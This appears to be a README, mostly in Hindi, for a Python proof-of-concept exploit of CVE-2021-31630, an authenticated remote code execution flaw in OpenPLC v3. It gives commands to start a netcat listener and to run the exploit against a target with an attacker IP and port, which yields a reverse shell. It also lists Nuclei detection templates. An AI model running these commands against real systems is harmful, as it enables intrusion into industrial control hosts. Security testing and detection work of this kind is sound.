
Python 3.13+ proof-of-concept exploit for CVE-2021-31630, enabling authenticated remote code execution on OpenPLC v3 via malicious hardware layer upload. Includes Nuclei detection templates for default credentials and vulnerability checks.
यह CVE-2021-31630 के लिए एक आधुनिक Python 3.13+ संगत प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है, जो OpenPLC v3 में एक कमजोरी है जो एक प्रमाणित उपयोगकर्ता को दुर्भावनापूर्ण कोड वाली कस्टम हार्डवेयर परत अपलोड करने की अनुमति देती है, जिससे होस्ट पर रिमोट कोड निष्पादन (RCE) होता है।
मूल कमजोरी की खोज और सलाह फेलिप ओलिवेरा द्वारा। यह पुनः कार्यान्वयन और आधुनिकीकरण httpx, CLI टूलिंग, लॉगिंग और सुरक्षित पहचान तकनीकों का उपयोग करता है।
nc -lvnp 9001
python3 openplc_rce.py http://target:8080 -lh YOUR_IP -lp 9001
वैकल्पिक फ्लैग्स:
nuclei -t nuclei-templates/openplc-default-login.yaml -u http://target:8080
nuclei -t nuclei-templates/openplc-authenticated-rce-check.yaml -u http://target:8080
दूसरा टेम्पलेट लॉगिन करता है और एक हानिरहित पेलोड अपलोड + संकलन का प्रयास करता है ताकि संभावित कमजोरी की पुष्टि हो सके — बिना वास्तविक कोड निष्पादन को ट्रिगर किए।
यह कोड केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है। सिस्टम स्वामी से स्पष्ट अनुमति के बिना उपयोग न करें।